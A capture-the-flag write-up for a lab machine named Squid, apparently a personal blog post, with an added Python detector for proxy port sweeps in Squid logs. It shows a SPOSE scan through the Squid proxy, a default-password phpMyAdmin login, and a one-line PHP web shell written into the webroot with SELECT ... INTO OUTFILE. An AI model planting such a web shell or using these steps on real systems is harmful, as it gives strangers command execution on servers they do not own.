
Squid

Machine Information

  • Machine Name: Squid
  • Machine Difficulty: Easy

Information Gathering

Classic nmap time

Nmap scan report for 192.168.108.189
Host is up, received user-set (0.021s latency).
Scanned at 2024-10-05 21:22:02 +08 for 209s
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
3128/tcp  open  http-proxy    syn-ack ttl 125 Squid http proxy 4.14
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/4.14
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

The only suspicious thing to look out for here is port 3128.

Port 3128

Port 3128 is a Squid proxy. According to https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid, I could use the SPOSE scanner to check for other open ports.

python spose.py --proxy http://192.168.108.189:3128/ --target 192.168.108.189
Using proxy address http://192.168.108.189:3128/
192.168.108.189 3306 seems OPEN 
192.168.108.189 8080 seems OPEN

With that, I know that port 8080 can be accessed through the Squid proxy.
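
From the defender's side, the SPOSE run above shows up in Squid's access.log as one client requesting many different ports on the same destination within seconds. The detector below is an added example, not part of the original write-up: the log lines are constructed, Squid's native access.log field order is assumed, and the names `parse_line` and `find_port_sweeps` and the thresholds are hypothetical.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in Squid's native access.log layout (assumed, not from the page):
# time elapsed client action/status bytes method URL ident hierarchy/peer type
SAMPLE_LOG = """\
1728134600.101   3 198.51.100.7 TCP_MISS/503 4012 GET http://192.168.108.189:21/ - HIER_DIRECT/192.168.108.189 text/html
1728134600.240   2 198.51.100.7 TCP_MISS/503 4012 GET http://192.168.108.189:22/ - HIER_DIRECT/192.168.108.189 text/html
1728134600.390   9 198.51.100.7 TCP_MISS/502 3980 GET http://192.168.108.189:3306/ - HIER_DIRECT/192.168.108.189 text/html
1728134600.520   2 198.51.100.7 TCP_MISS/503 4012 GET http://192.168.108.189:3389/ - HIER_DIRECT/192.168.108.189 text/html
1728134600.700  15 198.51.100.7 TCP_MISS/200 1830 GET http://192.168.108.189:8080/ - HIER_DIRECT/192.168.108.189 text/html
1728134651.000 120 198.51.100.20 TCP_TUNNEL/200 5120 CONNECT example.com:443 - HIER_DIRECT/203.0.113.10 -
"""

def parse_line(line):
    """Return (timestamp, client, dest_host, dest_port), or None if unparsable."""
    fields = line.split()
    if len(fields) < 7:
        return None
    url = fields[6]
    # CONNECT entries log a bare host:port, so give urlsplit a netloc to parse.
    parts = urlsplit(url if "://" in url else "//" + url)
    try:
        port = parts.port or (80 if parts.scheme == "http" else 443)
        ts = float(fields[0])
    except ValueError:
        return None
    if parts.hostname is None:
        return None
    return ts, fields[2], parts.hostname, port

def find_port_sweeps(log_text, min_ports=5, window=60.0):
    """Map (client, host) -> ports once min_ports distinct ports fall within window seconds."""
    seen = defaultdict(list)
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        ts, client, host, port = rec
        seen[(client, host)].append((ts, port))
    alerts = {}
    for key, hits in seen.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1  # slide the window forward
            ports = {p for _, p in hits[start:end + 1]}
            if len(ports) >= min_ports:
                alerts[key] = sorted(ports)
                break
    return alerts
```

Calling `find_port_sweeps(SAMPLE_LOG)` flags only the client that walked five ports on 192.168.108.189; the client with a single CONNECT is not reported.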

Port 8080

To access port 8080 through the Squid proxy, I’m using an extension named “FoxyProxy” to set up the proxy. To set it up in FoxyProxy, do the following:

Once the setup is ready, just click on the extension and change to squid.

Now I could access port 8080 as usual.

After looking around, I noticed that there’s a path to phpMyAdmin, which is a web page for accessing the database.

It seems like I could access it!! I then tried the default password and managed to log in.

Now that I have access to execute SQL commands, I tried to write a vulnerable PHP command into a file using a SQL command. Since this is a WampServer, the root directory should be C:\wamp\www

SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "C:\\wamp\\www\\test.php" 

The SQL command executed successfully. Now I could just check by accessing test.php.

Cool ~ Although I did not get a reverse shell, I managed to perform RCE and get an NT AUTHORITY\SYSTEM shell.

Things I learned from this machine

  • Always focus on proxy ports
  • Writing a file through SQL could lead to RCE
This post is licensed under CC BY 4.0 by the author.
